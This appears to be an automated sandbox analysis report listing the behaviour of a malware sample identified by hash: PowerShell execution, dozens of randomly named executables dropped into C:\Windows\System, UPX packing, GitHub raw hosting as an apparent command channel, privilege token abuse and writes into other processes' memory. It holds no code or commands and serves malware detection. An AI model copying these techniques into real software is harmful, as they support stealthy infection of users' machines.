N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\iawBxss.exe N/A
N/A N/A C:\Windows\System\IMxQeDg.exe N/A
N/A N/A C:\Windows\System\mdpHVaO.exe N/A
N/A N/A C:\Windows\System\hUiYhNq.exe N/A
N/A N/A C:\Windows\System\aoXmZlP.exe N/A
N/A N/A C:\Windows\System\WfDaPnl.exe N/A
N/A N/A C:\Windows\System\vYwvYEh.exe N/A
N/A N/A C:\Windows\System\pCqwNwX.exe N/A
N/A N/A C:\Windows\System\cmSvGdc.exe N/A
N/A N/A C:\Windows\System\SHtzeCg.exe N/A
N/A N/A C:\Windows\System\sDXcMzj.exe N/A
N/A N/A C:\Windows\System\dpXuEkL.exe N/A
N/A N/A C:\Windows\System\MKyDVGE.exe N/A
N/A N/A C:\Windows\System\XBepHJA.exe N/A
N/A N/A C:\Windows\System\FymJLDi.exe N/A
N/A N/A C:\Windows\System\MGIOPBR.exe N/A
N/A N/A C:\Windows\System\LywOsCg.exe N/A
N/A N/A C:\Windows\System\KoguhDL.exe N/A
N/A N/A C:\Windows\System\LIvLElR.exe N/A
N/A N/A C:\Windows\System\OwyhNjg.exe N/A
N/A N/A C:\Windows\System\zsReYhU.exe N/A
N/A N/A C:\Windows\System\ssfKygU.exe N/A
N/A N/A C:\Windows\System\tvtLwKN.exe N/A
N/A N/A C:\Windows\System\STEbEWe.exe N/A
N/A N/A C:\Windows\System\ubnHeig.exe N/A
N/A N/A C:\Windows\System\SbRwguE.exe N/A
N/A N/A C:\Windows\System\iDiNEvG.exe N/A
N/A N/A C:\Windows\System\DpjydzP.exe N/A
N/A N/A C:\Windows\System\elxqewp.exe N/A
N/A N/A C:\Windows\System\TMswONZ.exe N/A
N/A N/A C:\Windows\System\qpIxbZk.exe N/A
N/A N/A C:\Windows\System\qwXBXvN.exe N/A
N/A N/A C:\Windows\System\AGTlwZP.exe N/A
N/A N/A C:\Windows\System\hWMsrMp.exe N/A
N/A N/A C:\Windows\System\gAkrhtC.exe N/A
N/A N/A C:\Windows\System\KjwrZhi.exe N/A
N/A N/A C:\Windows\System\QMvrexs.exe N/A
N/A N/A C:\Windows\System\YTMCFbe.exe N/A
N/A N/A C:\Windows\System\AzTwmte.exe N/A
N/A N/A C:\Windows\System\kUvhJZj.exe N/A
N/A N/A C:\Windows\System\VXRqhJH.exe N/A
N/A N/A C:\Windows\System\ntFKvJv.exe N/A
N/A N/A C:\Windows\System\cmzyXRx.exe N/A
N/A N/A C:\Windows\System\WoqRTHI.exe N/A
N/A N/A C:\Windows\System\jjdWfMm.exe N/A
N/A N/A C:\Windows\System\ZrfFYWp.exe N/A
N/A N/A C:\Windows\System\yogLUqW.exe N/A
N/A N/A C:\Windows\System\vlPBGpp.exe N/A
N/A N/A C:\Windows\System\LIIKaYf.exe N/A
N/A N/A C:\Windows\System\BgZsuKY.exe N/A
N/A N/A C:\Windows\System\AljXIbV.exe N/A
N/A N/A C:\Windows\System\BBaqElR.exe N/A
N/A N/A C:\Windows\System\TqovUPM.exe N/A
N/A N/A C:\Windows\System\axBuOeK.exe N/A
N/A N/A C:\Windows\System\PuFmpuD.exe N/A
N/A N/A C:\Windows\System\vaemntu.exe N/A
N/A N/A C:\Windows\System\StFWysm.exe N/A
N/A N/A C:\Windows\System\LXsGwsh.exe N/A
N/A N/A C:\Windows\System\Dnxateq.exe N/A
N/A N/A C:\Windows\System\wJdTIcf.exe N/A
N/A N/A C:\Windows\System\jbgHETG.exe N/A
N/A N/A C:\Windows\System\zJveOin.exe N/A
N/A N/A C:\Windows\System\LXCzeVQ.exe N/A
N/A N/A C:\Windows\System\euOVVKr.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\hfDudKw.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\sVGNaxa.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\WoLzEbx.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\pywEzbI.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\OcfNpiR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\uSrfuyt.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\uovYxcd.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\JEONQTN.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\pAkIcOI.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\gqTfABB.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\NdyEItl.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\JjNJzuZ.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\PcLuCJC.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\hafCebx.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\jjWzVKR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\MGIOPBR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\HZOPrjV.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\zJxPzpA.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\wkATWSw.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\mxvleyf.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\xUDjfdm.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\boMJMaq.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\vSujcIp.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\oBUjdet.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\DFgjgLR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\rzalxEU.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\dJkdUxi.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\yEemWrJ.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\ijmGKpl.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\dxtruWc.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\GLcLCdM.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\fPCTLca.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\BSkbyVq.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\gtGDejI.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\oQZFuqn.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\tCPsyoM.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\FmlaNDa.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\QTTVNQj.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\aFpbcSu.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\DqpYmxL.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\XvEeIkj.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\LEtsJob.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\jglHwwq.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\tvuByYh.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\xcoAaua.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\EuvcRsw.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\TCsLzrv.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\emBYYXq.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\ebpILtR.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\GUjmmHS.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\XnfhRus.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\aclXfAB.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\PQquKHo.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\GVFDHDi.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\YuYDaCt.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\qFvkZbB.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\nLqLGDu.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\hNMrjBd.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\eAiUBNr.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\UOogIJk.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\FmYkjyv.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\qwXBXvN.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\TNqJeIj.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
File created C:\Windows\System\pWwkjqk.exe C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 216 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 216 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iawBxss.exe
PID 216 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iawBxss.exe
PID 216 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\IMxQeDg.exe
PID 216 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\IMxQeDg.exe
PID 216 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\mdpHVaO.exe
PID 216 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\mdpHVaO.exe
PID 216 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\hUiYhNq.exe
PID 216 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\hUiYhNq.exe
PID 216 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\aoXmZlP.exe
PID 216 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\aoXmZlP.exe
PID 216 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\WfDaPnl.exe
PID 216 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\WfDaPnl.exe
PID 216 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\vYwvYEh.exe
PID 216 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\vYwvYEh.exe
PID 216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\pCqwNwX.exe
PID 216 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\pCqwNwX.exe
PID 216 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\cmSvGdc.exe
PID 216 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\cmSvGdc.exe
PID 216 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SHtzeCg.exe
PID 216 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SHtzeCg.exe
PID 216 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\sDXcMzj.exe
PID 216 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\sDXcMzj.exe
PID 216 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\dpXuEkL.exe
PID 216 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\dpXuEkL.exe
PID 216 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MKyDVGE.exe
PID 216 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MKyDVGE.exe
PID 216 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\XBepHJA.exe
PID 216 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\XBepHJA.exe
PID 216 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\FymJLDi.exe
PID 216 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\FymJLDi.exe
PID 216 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MGIOPBR.exe
PID 216 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\MGIOPBR.exe
PID 216 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LywOsCg.exe
PID 216 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LywOsCg.exe
PID 216 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\KoguhDL.exe
PID 216 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\KoguhDL.exe
PID 216 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LIvLElR.exe
PID 216 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\LIvLElR.exe
PID 216 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\OwyhNjg.exe
PID 216 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\OwyhNjg.exe
PID 216 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\zsReYhU.exe
PID 216 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\zsReYhU.exe
PID 216 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\ssfKygU.exe
PID 216 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\ssfKygU.exe
PID 216 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\tvtLwKN.exe
PID 216 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\tvtLwKN.exe
PID 216 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\STEbEWe.exe
PID 216 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\STEbEWe.exe
PID 216 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\ubnHeig.exe
PID 216 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\ubnHeig.exe
PID 216 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SbRwguE.exe
PID 216 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\SbRwguE.exe
PID 216 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iDiNEvG.exe
PID 216 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\iDiNEvG.exe
PID 216 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\DpjydzP.exe
PID 216 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\DpjydzP.exe
PID 216 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\elxqewp.exe
PID 216 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\elxqewp.exe
PID 216 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\TMswONZ.exe
PID 216 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\TMswONZ.exe
PID 216 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe C:\Windows\System\qpIxbZk.exe
